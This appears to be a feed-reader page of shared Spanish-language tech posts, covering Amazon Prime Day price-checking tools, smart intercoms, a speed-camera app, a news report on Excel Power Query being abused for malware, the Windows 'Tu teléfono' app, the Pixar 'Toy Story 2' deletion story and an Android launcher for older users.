Shared posts

08 Jul 12:47

Amazon Prime Day 2020: los trucos, consejos y herramientas para saber si las ofertas son ofertas

by Eva Rodríguez de Luis

Amazon Prime Day 2020: los trucos, consejos y herramientas para saber si las ofertas son ofertas

Los próximos 13 y 14 de octubre tendrá lugar el Amazon Prime Day 2020, un evento de 48 horas de duración exclusivo para clientes de Amazon Prime en el que se lanzarán más de un millón de ofertas especiales en varias categorías.

Y es que a pesar de denominarse 'day' (día), este Amazon Prime Day 2020 comenzará el martes 13 de octubre a las 0:00 horas y durará hasta 23.59 horas del 14 de octubre. Entre ese más de millón de ofertas lanzadas por Amazon, algunas merecerán la pena pero otras, no tanto. ¿Cómo saber cuándo una oferta es buena? A continuación, una serie de herramientas, trucos y consejos para descubrirlo.

Cómo aprovechar las ofertas del Amazon Prime Day

Para disponer de las ofertas especiales realizadas por Amazon durante el Amazon Prime Day 2020 es necesario ser cliente de Amazon Prime, bien sea de pago o para aquellos que se encuentren en el periodo de prueba gratis de 30 días de duración.

Tanto si eres cliente de Amazon Prime de pago como si estás dentro del periodo de prueba gratis, podrás aprovechar las ofertas del Amazon Prime Day 2020, tener los envíos gratis en 24 horas, acceder al catálogo de series y películas de Amazon Video y otras ventajas.

Amazon Prime day: ofertas, ofertas flash y ofertas del día

Como es habitual, además de las ofertas per se, Amazon lanzará también ofertas flash y ofertas del día durante el evento. Y ¿qué diferencias hay entre las ofertas flash y las ofertas del día? La duración: mientras que las ofertas flash duran unas pocas horas, las ofertas del día se extienden a un día natural, siempre y cuando haya stock.

Para que la espera sea más amena, desde el anuncio de la fecha del Prime Day 2020 Amazon ha rebajado algunos dispositivos Amazon como el set Amazon eero o las cámaras Blink. También ha lanzado promociones como Amazon Music Unlimited durante 4 meses por 0,99 euros, 3 meses gratis de Kindle Unlimited al comprar un Kindle, rebajas en Amazon Moda, Hogar y marcas Amazon, descuento del 30% en Prime Now para los clientes Prime de Madrid y Barcelona. Y durante el Prime Day los usuarios de Prime contarán con un 50% de descuento en una selección de Prime Video.

Asimismo, si eres cliente de Prime y gastas 10 euros en productos vendidos por pequeñas y medianas empresas, así como marcas nacionales seleccionadas en la tienda de Amazon, recibirás 10 euros de saldo promocional para usar durante el Prime Day. Esta promoción termina el 12 de octubre.

La montaña rusa de precios de Amazon

Es frecuente que en eventos especiales como el Black Friday, el Cyber Monday o el Amazon Prime Day, las ventas se disparen porque muchos usuarios esperan estos hitos para comprar lo que desean a buen precio.

Pero a veces estas ofertas no lo son tanto, a pesar de que veamos que hay un descuento sobre su PVP. En Amazon es habitual que existan variaciones de precio: no solo a lo largo del tiempo, sino también incluso dentro de un mismo día. Así, hoy podemos localizar un producto con un descuento del 10% desconociendo que quizás hace un tiempo Amazon había realizado un descuento similar o incluso superior sin necesidad de eventos especiales.

Asimismo, también podemos constatar que Amazon esté haciendo una buena rebaja en un producto, pero al mirar otros comercios online descubramos que ese mismo producto puede adquirirse a un precio similar, de modo que su descuento no sea tan atractivo comparado con su precio real de venta en el mercado.

Si has marcado el Amazon Prime Day 2020 en tu calendario para realizar tus compras aprovechando sus ofertas, te recomendamos que antes de realizar la transacción pruebes estas herramientas para hacer la compra más inteligente.

Para verlo más claro, usaremos un ejemplo práctico: el monitor con resolución 4K de 28 pulgadas AOC U2879VF, que según Amazon cuenta con una rebaja del 33% al tener un precio de venta recomendado de 299 euros pero costar en estos momentos 199 euros. ¿Es o no es una buena oferta?

Captura De Pantalla 2020 10 06 A Las 11 19 56

Cómo encontrar las mejores ofertas de Amazon

En épocas como el Amazon Prime Day, para localizar las ofertas solo tendremos que entrar en la página web y clicar sobre el banner. Pero además, para agilizar el proceso de búsqueda, este año Amazon ha introducido la novedad del buscador de ofertas Prime Day, una barra especial para dar con las mejores ofertas del Prime Day 2020.

Pero, ¿y si no es Prime Day y queremos localizar las ofertas diarias o las ofertas flash?Entonces tendremos que hacer click sobre 'Ofertas', situada en la barra superior, justo debajo del cajetín de búsqueda. En esa sección verás un escaparate con las más relevantes, pudiendo elegir por categorías y tipo de ofertas en la columna de la izquierda. Otra posibilidad que nos ofrece Amazon es la de ordenar las ofertas por relevancia, precios, descuentos o ventas.

Ofertas

Es importante fijarse en quién vende y envía los productos. Normalmente suelen ser las tiendas oficiales y Amazon los que tengan las ofertas más atractivas.

Fíjate bien en quién vende y envía los productos: normalmente son las tiendas oficiales y el propio Amazon los que cuentan con las ofertas más atractivas.

Camelcamelcamel

La página web CamelCamelCamel, trackea el historial de precios de productos de Amazon. Para ello, solo tendremos que introducir el URL del producto o las palabras clave de búsqueda en Amazon.

Tras introducir el producto que nos interese, comprobaremos los resultados para comprobar o no si es una buena oferta o si, por el contrario, ese producto ya había estado rebajado anteriormente incluso a un precio inferior al actual.

Un punto interesante de esta página es que nos permite crear alertas cuando el producto baje de precio hasta el límite que pongamos, aunque para eso tendremos que registrarnos.

Volvemos a nuestro deseado monitor 4K de AOC para verificar la oferta. Tras copiar y pegar la URL, Camelcamelcamel nos muestra una gráfica en el que podemos ver los precios de los últimos meses: desde que se introdujo en la plataforma (hace más de tres) ha ido bajando de precio de forma más o menos continuada y lleva ya unas semanas a ese precio de 199 euros. No obstante, en momentos puntuales ha llegado a rondar los 220 euros.

Captura De Pantalla 2020 10 06 A Las 11 03 23

Keepa

Otra herramienta para controlar los precios de un producto que nos interese de forma más rápida y cómoda es instalar un plugin en tu navegador como Keepa. Keepa es un trackeador de precios de Amazon para Google Chrome, Firefox, Opera y Microsoft Edge.

Captura De Pantalla 2020 10 06 A Las 11 06 05

Su funcionamiento es similar al de Camelcamelcamel, recurriendo a una intuitiva gráfica para ver el historial de precios echando la vista atrás en el tiempo. Asimismo, también dispone de las opciones de variar el abanico temporal y la condición del artículo.

A pesar de su pequeño tamaño, Keepa es una herramienta robusta y completa que consta de varias pestañas para seguir el producto estableciendo tanto el rango de precios como otras características, aunque requerirá que nos registremos.

Lo mejor de Keepa es que no tenemos que salir de Amazon: solo ir a la URL del producto que te interese en Amazon a través de tu navegador y visualizar la gráfica de Keepa en la parte inferior de la página.

Atendiendo al ejemplo que estamos analizando, constatamos que según Keepa se encuentra en su precio mínimo histórico.

Google Shopping

Las herramientas anteriores nos permitían conocer si una oferta de Amazon era tal teniendo en cuenta los precios anteriores de Amazon. Pero, ¿cómo es ese precio respecto a otros comercios?

En estos casos merece la pena recurrir al clásico y efectivo Google Shopping, el comparador de precios de ventas de algunos comercios listados por el motor de búsqueda de Google. Con esta herramienta no veremos historiales de precios, sino que podremos comparar entre tiendas que venden el mismo producto en internet.

Hacer uso de Google Shopping es muy sencillo: simplemente tendremos que buscar el modelo en Google. Será en el margen de la derecha donde veremos el precio de este producto en otras tiendas.

Captura De Pantalla 2020 10 06 A Las 11 08 27

Aunque hay que prestar atención porque a veces el producto no se corresponde tal cual o hay que añadirle los gastos de envío. Si queremos profundizar más, pulsaremos sobre "Shopping" y ordenaremos por precio para localizar la mejor oferta.

Una vez tengamos claro cuál es la mejor oferta, es importante que antes de realizar la compra dediquemos un momento a leer otros aspectos como las condiciones de venta, la garantía o el servicio de atención al cliente. No todo es cuestión de precio y, en caso de surgir problemas, mejor apostar por un comercio que nos ofrezca un buen soporte, aunque no sea el más barato de la lista.

Captura De Pantalla 2020 10 06 A Las 11 10 15

Tras introducir el monitor 4K en Google Shopping comprobamos que la de Amazon es la oferta más atractiva.

Puedes estar al día y en cada momento informado de las mejores ofertas del Amazon Prime Day 2020 en nuestro canal de Telegram o suscribiéndote a la Newsletter de Xataka.

-
La noticia Amazon Prime Day 2020: los trucos, consejos y herramientas para saber si las ofertas son ofertas fue publicada originalmente en Xataka por Eva Rodríguez de Luis .

08 Jul 09:00

Los nuevos videporteros de Fermax se conectan a la red Wi-Fi de casa para permitir su control desde el móvil

by Jose Antonio

Los nuevos videporteros de Fermax se conectan a la red Wi-Fi de casa para permitir su control desde el móvil

El fabricante de porteros electrónicos Fermax, ha presentado una solución bastante interesante ahora que muchos se van de vacaciones. Dos nuevos porteros electrónicos, el Veo WiFi Duox y Veo-XS WiFi Duox que permiten su control desde nuestro smartphone.

Una solución útil, pues en parte aporta un plus de seguridad a nuestros hogares, ya que aunque nos encontremos ausentes podremos contestar cualquier llamada al portero al igual que si estuviesemos en casa y hacerlo con independencia del lugar en el que nos encontremos.

Control desde cualquier lugar

Videoportero

Los dos nuevos terminales cuentan con tecnología Duox y se sirven de la conexión a la red Wi-Fi de casa para facilitar la conectividad permanente con nuestro móvil. De esta forma podemos abrir la puerta de casa desde un teléfono móvil o tableta.

Los dos nuevos modelos, Veo WiFi Duox y Veo-XS WiFi Duox cuentan con un sistema que nos permite por medio de una aplicación que instalamos en el móvil, comprobar quién llama en cada momento y no sólo escuchar su voz, puesto que al integrar una cámara también podemos verlo.

Para poder conectar a distancia con el videoportero debemos descargar la aplicación Blue en iOS o Android, la cual hace de nexo de unión entre el portero y el móvil o tableta que vamos a usar.

Eo en cuanto al uso a distancia, puesto que como es lógico, ambos modelos cuentan con los controles para poder operar desde la misma consola si estamos en casa. En este sentido la diferencia entre ambos es que el Veo-XS WiFi Duox no integra el típico "telefonillo" y monta un sistema de manos libres. El resto de prestaciones son las mismas, con una pantalla a color de 4,3 pulgadas y una relación de aspecto 16:9.

Más información | Fermax

También te recomendamos

Homekit Secure Video: Apple amplía el número de dispositivos compatibles con su plataforma para vigilar nuestro hogar

Los inconvenientes de la hiperconectividad permanente: cuando hasta tu tele necesita un antivirus

El hogar conectado llega al videoportero en casa para controlar quién llama aunque no estemos en nuestro hogar

-
La noticia Los nuevos videporteros de Fermax se conectan a la red Wi-Fi de casa para permitir su control desde el móvil fue publicada originalmente en Xataka Smart Home por Jose Antonio .

08 Jul 08:10

Este es el mejor avisador de radares gratis para Android. (Compatible con todos los GPS, incluso Maps de Google)

by Francisco Ruiz

Si eres de los que no le gusta usar un navegador GPS como por ejemplo Maps de Google o Waze también propiedad de Google, pero si que quieres disfrutar de funcionalidades de estos navegadores GPS como son las alertas de radares, entonces este vídeo-post te va a venir ni que pintado ya que te voy a presentar el que para mi es el mejor avisador de radares gratis para Android.

La aplicación que hoy les paso a recomendar y a enseñar en vídeo al detalle, además de poderse hacer servir de manera autónoma, también puede ser un gran aliado y un gran compañero para tu aplicación de navegación GPS convencional ya que además cuenta con la opción de mostrarse en una pequeña ventana a modo de mini-velocímetro encima de todas las aplicaciones que estemos ejecutando en nuestro dispositivo.

 

Este es el mejor avisador de radares gratis para Android. (Compatible con todos los GPS, incluso Maps de Google)

La aplicación que no me voy a cansar de repetir que es totalmente gratuita y sin ningún tipo de anuncio integrado en la misma, es una aplicación firmada por la mismísima TomTom y cuenta con una gran comunidad activa detrás que va mejorando día a día la aplicación confirmando y ayudando a verificar donde se encuentran los radares fijo, móviles, de tramo y cualquier otro tipo de radar que nos podamos encontrar en la vía por la que estamos circulando.

La aplicación que responde al nombre de TomTom Radares – Alertas de Tráfico, como no podía ser de otra manera, la vamos a poder descargar de manera totallmente gratuita desde el Play Store de Google, la tienda de aplicaciones oficiales para Android, desde el enlace directo que les dejo justo debajo de estas líneas:

Descargar gratis TomTom Radares – Alertas de Tráfico desde el Play Store de Google

TomTom Radares - Alertas de Tráfico (Free, Google Play) →

Pero, ¿que es lo que nos ofrece TomTom Radares – Alertas de Tráfico?

Este es el mejor avisador de radares gratis para Android. (Compatible con todos los GPS, incluso Maps de Google)

 

En el vídeo adjunto que les he dejado al principio de este post les comento con todo lujo de detalles todo lo que nos ofrece TomTom Radares – Alertas de Tráfico para que yo la vea como la mejor aplicación avisador de radares gratis para Android, unas funcionalidades añadidas que a continuación les paso a enumerar a modo de resumen:

  1. Aplicación totalmente gratis.
  2. Aplicación constantemente actualizada por la comunidad de más de 5 millones de usuarios activos.
  3. Aplicación muy pero que muy liviana.
  4. Funciona perfectamente en segundo plano sin necesidad de llevar constantemente la pantalla de móvil encendida.
  5. Alertas claras y concisas, tanto en el modo de pantalla apagada mediante alertas por voz  como en el modo de pantalla encendida con alertas por voz además de alertas en pantalla.
  6. Diferentes modos de vista, vista de velocímetro que se muestra encima de todas las aplicaciones, vista de velocímetro a pantalla completa, vista ,modo carretera y vista en mapa.
  7. Función para que se active la aplicación de manera automática al conectarnos con el Bluetooth del coche, o el Bluetooth de los cascos para los motoristas.
  8. Apagado automático de la app tras un cierto tiempo de inactividad para ahorrar batería de nuestro Android.
  9. Alertas de voz en Español.
  10. Tiempo de las alertas de voz configurables desde los ajustes de la app.
  11. Y muchas cosas más.

Este es el mejor avisador de radares gratis para Android. (Compatible con todos los GPS, incluso Maps de Google)

Si queréis ver la aplicación funcionando en acción en una conducción real y en sus diferentes modos de vista, os aconsejo que le echéis una ojeada al vídeo adjunto que les he dejado al principio de este post, vídeo en el que me doy una vuelta con mi vehículo para que puedas ver lo bien que funciona la aplicación en tiempo real.

TomTom Radares - Alertas de Tráfico

Velocímetro que se muestra encima de todas las apps

Una aplicación que, os vuelvo a recordar que es totalmente gratuita, sin ningún tipo de suscripción alguna y sin ningún tipo de publicidad añadida in app.

05 Jul 07:10

La herramienta Power Query dentro de Excel es también un agujero de seguridad que Microsoft no tiene cómo solucionar

by Cristian Rus

La herramienta Power Query dentro de Excel es también un agujero de seguridad que Microsoft no tiene cómo solucionar

Microsoft Excel es mucho más que una app para hojas de cálculo. En ya más de 30 años de historia la app de Microsoft se ha utilizado para todo tipo de actividades, incluso para crear verdaderas obras de arte. Para lo que también está sirviendo Microsoft Excel es para hacer de puerta de acceso a hackers y atacantes, todo gracias a su función Power Query.

Power Query es una funcionalidad dentro de Microsoft Excel que permite acceder a datos de fuentes externas para crear bases de datos dentro de la hoja de cálculo.La herramienta permite además combinar, gestionar y compartir de diferentes formas estos datos dentro de Excel. Está disponible en las últimas versiones de Office, pero también se puede descargar de forma independiente para versiones previas.

Qqq Power Query en Excel.

Un entorno perfecto para atacantes

Un programa que permite ejecutar código proveniente de entornos externos se convierte en el objetivo ideal para el malware. En una investigación publicada por Mimecast han demostrado cómo se puede abusar de Power Query para ejecutar malware en el ordenador o dispositivo del usuario que esté utilizado Power Query de Excel. Tan simple como crear un documento Excel que utilice Power Query para importar datos desde un servidor externo del atacante.

Img 1 Importación datos de fuentes externas mediante Power Query en Excel.

Cuando el usuario abre un documento de Excel con Power Query aparece una barra advirtiendo de que hay contenido en remoto que cargar. Si el usuario autoriza habilitar la importación de Power Query se ejecuta el código malicioso desde el servidor remoto mediante Power Query. A partir de ahí el malware infecta el ordenador al completo. ¿Qué tiene de especial esta técnica? No todo el mundo desconfía de un documento de Excel como de un programa con un nombre sospechoso. Todo el sistema se basa en la confiabilidad que otorga tanto el usuario como el ordenador a Microsoft/Excel. No solamente es una puerta abierta para atacantes, sino que viene con alfombra incluida para entrar de la manera más cómoda.

Sin forma posible de arreglarlo

¿Qué puede hacer Microsoft al respecto? No mucho. Mimecast comenta que se han puesto en contacto con Microsoft para alertarles de la vulnerabilidad, sin embargo Microsoft se ha negado a solucionar el problema. No es que no quieran, es que realmente no pueden. La forma en la que se diseñó Power Query en Excel no presenta ningún fallo de funcionalidad, el problema radica en el uso que se le da a la herramienta.

En 2017 SensePost descubrió una vulnerabilidad similar que aprovechaba el intercambio dinámico de datos (DDE) para importar archivos de Excel maliciosos. Microsoft deshabilitó de forma predeterminada esta herramienta en Word, pero no en Excel, donde se usa más a menudo. La solución para evitar los ataques mediante Power Query radica en deshabilitar DDE en Excel, indica Microsoft. Al deshabilitar esta funcionalidad también se evita la entrada de malware mediante Power Query. Eso sí, deja de poder utilizarse.

Vía | WIRED
Más información | Mimecast

También te recomendamos

17 fórmulas de Google Sheets para convertirte en un maestro de las hojas de cálculo de Google

El grandioso mundo del Excel Art: 19 hojas de cálculo hechas obras de arte

Cómo cambiar filas por columnas en Excel

-
La noticia La herramienta Power Query dentro de Excel es también un agujero de seguridad que Microsoft no tiene cómo solucionar fue publicada originalmente en Xataka por Cristian Rus .

04 Jul 16:24

Cómo ver notificaciones de tu smartphone Android y responder mensajes SMS en la aplicación 'Tu teléfono' de Windows 10

by Ricardo Aguilar

Cómo ver notificaciones de tu smartphone Android y responder mensajes SMS en la aplicación 'Tu teléfono' de Windows 10

Ayer mismo te contábamos que la nueva versión de 'Tu teléfono' venía de la mano de la sincronización con las notificaciones en Android. Yendo incluso más allá de esto, los usuarios Insider con dispositivos Samsung Galaxy pueden probar las nuevas funciones de mirroring de móvil a PC.

Para todos aquellos usuarios que no han dado el salto a la versión Insider, traemos un tutorial acerca de cómo configurar 'Tu teléfono' para poder recibir notificaciones de nuestro teléfono Android en un PC con Windows 10.

Recibiendo notificaciones del móvil en el PC

MI telefono

Lo primero que debemos saber es si cumplimos con los requisitos para usar la app 'Tu teléfono'. Por un lado, será necesario que nuestro ordenador cuente, como mínimo, con la Windows 10 April 2018 Update (versión 1803), y que nuestro teléfono esté corriendo bajo Android Nougat 7.0 o superiores. Si cumplimos estos requisitos, será necesario instalar la aplicación Compañero de Tu teléfono en nuestro teléfono Android (es completamente gratuita). Del mismo modo, instalaremos Tu teléfono en nuestro ordenador con Windows 10.

Las funciones de notificaciones, fotos y mensajes, por el momento, no funcionan en dispositivos con iOS

Tras abrir la aplicación en el PC, veremos la opción de utilizar Android o iOS (en iOS estas funciones no están disponibles aún), así que seleccionamos Android. Para vincular el PC al teléfono no tenemos más que abrir la aplicación en el móvil e introducir nuestra cuenta de Microsoft.

El programa nos mostrará la opción de ver nuestras fotografías, responder mensajes (SMS) o ver nuestras notificaciones. Empezando por este apartado, 'notificaciones' da lo que promete, y nos replica en el ordenador las notificaciones pendientes que tenemos en el teléfono.

notificaciones
notificaciones windows 10 Así lucen los banners, mostrados en la esquina inferior derecha de Windows 10

Respecto a estas notificaciones, no podemos responder a ellas aún ni de forma normal ni mediante la respuesta rápida (aunque Microsoft promete respuestas rápidas en un futuro), pero sí que podemos descartarlas pulsando sobre la 'x' que aparece a la derecha de cada notificación. En cuanto a las opciones de configuración, podemos activar estas notificaciones así como sus banners, poco más.

A pesar de que las notificaciones llegarán de forma automática en cuanto el teléfono las reciba, podemos forzar la actualización de forma manual, por si alguna notificación se hubiese perdido por el camino.

Mensajes

El apartado de mensajes sí que nos permite responder directamente desde el ordenador. De hecho, en este caso, sí que contamos con respuestas rápidas (desde el banner de notificación), por lo que esperamos que esta posibilidad se traslade no demasiado tarde al apartado de 'notificaciones'. A nivel de configuración, del mismo, modo, este apartado es algo más rico.

mensajes

En este caso, podemos permitir o no los banners de notificación, envío y recibo de adjuntos de MMS, añadir un distintivo en la barra de tareas... En resumidas cuentas, el apartado de mensajes nos muestra un escenario idílico sobre el que trabajar a la hora de mejorar el de notificaciones.

En resumidas cuentas, la aplicación de 'Tu teléfono' nos permite recibir y responder SMS, así como visualizar las notificaciones que nos llegan desde el teléfono de una forma cómoda. Queda pues, esperar a que las respuestas rápidas hagan su aparición, así como el mirroring, que de momento queda reservado para los dispositivos Galaxy de Samsung.

También te recomendamos

Twitter envía por error cientos de notificaciones aleatorias con extraños códigos

VClip: una herramienta gratis para Windows que te deja grabar tu pantalla en varios formatos y con audio incluido

Cuatro aplicaciones para imitar las mejores funciones de Windows en macOS

-
La noticia Cómo ver notificaciones de tu smartphone Android y responder mensajes SMS en la aplicación 'Tu teléfono' de Windows 10 fue publicada originalmente en Genbeta por Ricardo Aguilar .

04 Jul 16:24

Telefónica abre una escuela de programación gratuita, sin profesores ni horarios, ni paro

by Alez Curquejo

Las necesidades laborales empresariales de hoy en día no se ajustan a la educación clásica que se imparte en las universidades desde hace siglos. Ni siquiera la introducción de ordenadores, Internet, y

La entrada Telefónica abre una escuela de programación gratuita, sin profesores ni horarios, ni paro se publicó primero en ITPro.es.

04 Jul 16:23

Instalación y configuración de OpenSSH Server en Windows Server 2019

by Jair Gomez Arias
04 Jul 16:23

Hide posts and show hidden posts on the timeline

by Tina Brands

In the series of blog posts about Social Collaboration we showed you how you can use the Timeline functionality in Exact Synergy. In the meantime, we have continued to develop, and various improvements and new functionalities can now be found in the timeline. In the coming period we will discuss a number of new features on this support blog. This blog post highlights hiding posts and showing hidden posts.

Hide posts

It may happen that you no longer want to see a post on your timeline. In such a case you can easily hide that post. To do this, click the icon in the post. You can then choose Hide.

Show hidden posts

To display the posts that you have hidden, you can open the Hidden posts tab. This tab is not standard on the timeline, but can be added by clicking the icon at the top of the timeline. You can then choose Hidden posts.

After you have clicked this a new tab will appear. All hidden posts are displayed on this tab. To unhide the post and put it back on the timeline, click on the icon in the post and choose Unhide post.

04 Jul 16:20

Comando at: Programación de tareas únicas en Linux

by davidochobits

Tal y como indica el título de la entrada hablamos del comando at, que nos permite programar tareas únicas en nuestro sistemas GNU/Linux No hace falta decir que para programar tareas repetitivas debemos utilizar...

La entrada Comando at: Programación de tareas únicas en Linux se publicó primero en ochobitshacenunbyte.

03 Jul 12:30

Cómo Pixar recuperó 'Toy Story 2' tras borrar toda la película por error y sin copia de seguridad

by Cristian Rus

Cómo Pixar recuperó 'Toy Story 2' tras borrar toda la película por error y sin copia de seguridad

Es 1998 en los estudios de Pixar en Richmond. Unas 150 personas están trabajando en la animación, el modelado y el montaje de la que esperan que sea el próximo gran éxito del estudio de animación: 'Toy Story 2'. Sin embargo, alguien de esas 150 personas ejecuta un rm –rf en su ordenador. No lo sabe, pero acaba de provocar la pérdida del 90% de la producción de 'Toy Story 2'.

'Toy Story 2' se ha convertido en una de las mejores películas de animación de la historia. Sus galardones y los casi 500 millones de dólares que cosechó son la prueba de ello. Esto le ha permitido a Pixar (y Disney al ser parte del congromelado) seguir apostando por la franquicia con la llegada de 'Toy Story 3' posteriormente y 'Toy Story 4' que llegó a los cines el pasado 2019 y se convirtió en una de las películas más taquilleras del año en Disney. Pero volviendo a 'Ty Story 2', no fue nada fácil sacar adelante la segunda película de Woody y compañía, un simple comando de Linux/Unix para eliminar un archivo desencadenó una serie de acciones que casi acaban en catástrofe.

Permisos de usuarios para todos y copias de seguridad subestimadas

Los accidentes ocurren, son inevitables, pero hay formas de prevenirlos o mitigar el daño que puedan causar. En Pixar no se tomaron las precauciones necesarias para ello. Por aquel 1998 llevaban diez meses en la producción de 'Toy Story 2', que se esperaba que se estrenase en noviembre de 1999. Hoy en día a ningún equipo de trabajo se le ocurriría dar permisos root a todos los miembros, tampoco fiarse de una única copia de seguridad cuando hay millones de dólares/euros de por medio. En Pixar eran algo especiales, Pixar siempre ha sido especial.

En una entrevista a TNW cuenta Oren Jacob, director técnico asociado de 'Toy Story 2', que estaba buscando una escena concreta de Woody cuando todo comenzó. Al intentar visualizar la escena el ordenador comenzó a darle errores, indicando que el directorio donde debía estar la escena no existía. Pensó que simplemente habían movido la escena de lugar, pero poco a poco se dió cuenta que más escenas, atributos de los personajes e ítems comenzaban a desaparecer.

Toy Story "Espera, ¡¿por qué están desapareciendo los archivos?!"

¿Qué había pasado exactamente? Al parecer un miembro del equipo había ejecutado un comando rm –rf. No es un comando tan grave, en Linux/Unix es uno de los más utilizados y sirve simplemente para borrar archivos o directorios. Pero claro, se había ejecutado con permisos de root y al más alto nivel. Se había ordenado la eliminación de todo el sistema compartido de archivos del proyecto de 'Toy Story 2'.

En el estudio de Pixar les gustaba trabajar como un equipo por igual. Todos los empleados que trabajaban en la edición de la película tenían los mismos permisos de acceso para trabajar en conjunto y de forma simultánea. De este modo cada uno avanzaba en cierto aspecto de la producción para ahorrar tiempo. No tener una jerarquía tiene sus ventajas, pero también desventajas.

Toy Story 2 "¿Cómo se te pasa por la cabeza dar permisos root a todos? Explícamelo."

Ante el caos que se venía encima y viendo en directo cómo todo el trabajo de los últimos 10 meses se estaba borrando decidieron desenchufar directamente todo el sistema para evitar que siga borrando archivos. No pasa nada, hay copias de seguridad, ¿no? Más o menos. Cuando unas horas más tarde decidieron restaurar la última copia de seguridad de los archivos se toparon con el siguiente gran error técnico que habían cometido: faltaba la mayor parte de la película en la copia de seguridad.

Pensemos que estamos en 1998, la era digital aún estaba en pleno auge y en Pixar subestimaron hasta dónde podían llegar. Al inicio de la producción y cuando se montó todo el sistema de trabajo pensaron que con 4 GB de espacio tendrían suficiente para la copia de seguridad. Una cifra ridícula hoy en día, pero por aquel entonces era bastante alta. Aunque no lo suficiente, pues con todo el trabajo que llevaban hecho ya tenían más de 10 GB de película cuando se borró por accidente. Como resultado la copia de seguridad empezó a sobrescribir archivos cuando llegó al límite de los 4 GB.

Todas las esperanzas depositadas en una madre que acababa de dar a luz

Galyn Susman se podría decir que es la heroína que salvó 'Toy Story 2'. Unos meses antes del desastre la empleada de Pixar dió a luz, Pixar decidió montarle un equipo de trabajo en su casa para que pudiese trabajar en remoto. El equipo de trabajo incluía ordenador, otras herramientas de animación y sobre todo el material de la película. Susman recibía periódicamente las actualizaciones de los archivos de la película.

En Pixar, con el pánico a punto de apoderarse de los directivos, decidieron ir rápidamente a la casa de Susman para ver si aún disponía de los ficheros. Se llevaron todo el ordenador y discos duros con el máximo cuidado posible. Lo envolvieron en varias mantas y con cinturones en los asientos de un coche. Ese ordenador de repente había aumentado su valor en fácilmente 100 millones de dólares si contenía los archivos correctos en su interior.

Al llevar el equipo a los estudios de Pixar y encenderlo... suspiraron aliviados. El equipo tenía los archivos actualizados a la versión de hace dos semanas. Por lo tanto "sólo" se había perdido el trabajo de las últimas dos semanas y no de los últimos diez meses. Con eso y con algo de ficheros que aún no habían llegado a borrarse en los ordenadores del estudio podían recuperar casi toda la película.

El proceso de recuperación no había acabado. Ahora tocaba comprobar todos los archivos para restaurar las versiones correctas. El equipo estuvo verificando miles de ficheros uno a uno para escoger la versión correcta. Oren comenta que trabajaron durante todo el fin de semana con horarios de entre diez y doce horas al día para ello, algunos incluso dormían en la oficina. 'Toy Story 2' se recuperó, la pesadilla terminó.

Toy Story 2 "Todo bajo control, no hay de qué preocuparse."

Vía | TNW

-
La noticia Cómo Pixar recuperó 'Toy Story 2' tras borrar toda la película por error y sin copia de seguridad fue publicada originalmente en Xataka por Cristian Rus .

03 Jul 06:46

El mejor Launcher para personas mayores es gratis

by Francisco Ruiz

Hoy os traigo una aplicación que seguramente para la mayoría de nosotros en alguna ocasión nos va a ser de mucha utilidad, y es que levante la mano el que alguna vez a buscado una aplicación para optimizar un smartphone Android para dejarlo accesible para una persona mayor o con algún tipo de problema de visión u otros relacionados por norma general con la edad.

Me jugaría lo que fuese a que casi todo el mundo que esté leyendo este post ha levantado la mano. ¿A qué si?. Pues bien, si estás entre los que ha levantado la mano o entre los que no, para el caso me da igual, la aplicación que a continuación les voy a presentar, una app totalmente gratuita para Android, “os va a venir ni que pal pelo” ya vais a poder descargar un Launcher para personas mayores gratis.

La aplicación de la que les estoy hablando, aunque en un principio muchos de vosotros hayáis pensado en el archi-conocido Big Launcher, es una aplicación que responde al nombre de Lanzador Modo Fácil, y como os digo la vais a poder descargar ee instalr de manera totalmente gratuita desde el Play Store de Google desde el enlace directo que les dejo justo debajo de estas líneas.

Descargar Lanzador Modo Fácil gratis desde el Play Store de Google

Lanzador Modo Fácil (Free, Google Play) →

Todo lo que nos ofrece Lanzador Modo Fácil para ayudar a nuestros mayores

El mejor Launcher para personas mayores es gratis

En el vídeo que les he dejado justo al principio de este artículo, les explico con todo lujo de detalles todo lo que nos ofrece Lanzador Modo Fácil, el Launcher que está pensado para hacer accesible cualquier terminal Android para las personas mayores, personas con problemas de visión, problemas de trazabilidad o que simplemente no se quieren liar con tantas y tantas funcionalidades que nunca van a utilizar y que lo único que hacen es liar su experiencia de usuario  con sus terminales Android.

Un Launcher muy fácil de usar

El mejor Launcher para personas mayores es gratis

Y es que es un hecho de que la mayoría de las personas mayores tan solo utilizan su Smartphone Android para llamar a cuatro o cinco contactos, enviar algún que otro WhatsApp, y los más atrevidos o modernos, mirar su perfil de Facebook o jugar a algún que otro juego como por ejemplo el Apalabrados o Preguntados, dos juegos que tienen una muy buena acogida entre las personas de mayor edad.

Pues esto es ni más ni menos lo que nos ofrece este Launcher para personas mayores, un Launcher en el que todo se ve muy grande y todo lo que principalmente se utiliza en el día a día lo vas a tener a mano ya que se va a poder encontrar de manera directa en la pantalla o pantallas de inicio que se ponen a nuestra disposición.

Las aplicaciones que más utilizan accesibles a un click

El mejor Launcher para personas mayores es gratis

Así contamos con una pantalla principal en la que se muestra un gran reloj con la fecha completa y a la hora que va a sonar la siguiente alarma programada, además de cuatro baldosas en las que añadir las aplicaciones que más se utilizan en el día a día como WhatsApp o Telegram, el dialer y acceso directo a mensajes y acceso directo a los ajustes internos del propio lanzador de aplicaciones.

Podemos seguir añadiendo aplicaciones que se mostrarán en pantallas contiguas deslizando hacia la izquierda, mostrándose con el mismo estilo de grandes baldosas que facilitan mucho el uso del Launcher para los mayores de la casa.

Los contactos frecuentes a mano con tan solo un swipe

El mejor Launcher para personas mayores es gratis

Si deslizamos la pantalla principal hacia la derecha, nos encontraremos con nuestros contactos frecuentes para comunicarnos con ellos ya sea vía llamada o mensaje de texto de una manera muy pero que muy sencilla.

Accesos directos a las funciones más comunes de nuestro Android, ¡incluso acceso directo a la linterna que siempre es de utilidad!

El mejor Launcher para personas mayores es gratis

Si volvemos a deslizar hacia la derecha nos encontraremos con los ajustes principales de nuestro Android con lo son el Wifi, Bluetooth, el brillo, el tono, modo avión e incluso un acceso directo para encender/apagar la linterna. Todo ello claro está siempre con unos botones muy grandes para una mejor accesibilidad de estas personas con necesidades especiales.

En fin, si queréis saber más sobre todo lo que nos ofrece este Launcher para personas mayores, Lanzador Modo Fácil, os recomiendo que nos os perdáis detalle del vídeo adjunto que encontraréis al principio de este artículo.

03 Jul 06:45

Hackeando Todas Las Órdenes De Compra De Una Empresa De Telefonía / Base64 NO es un método de encriptación

by noreply@blogger.com (Leo Romero)

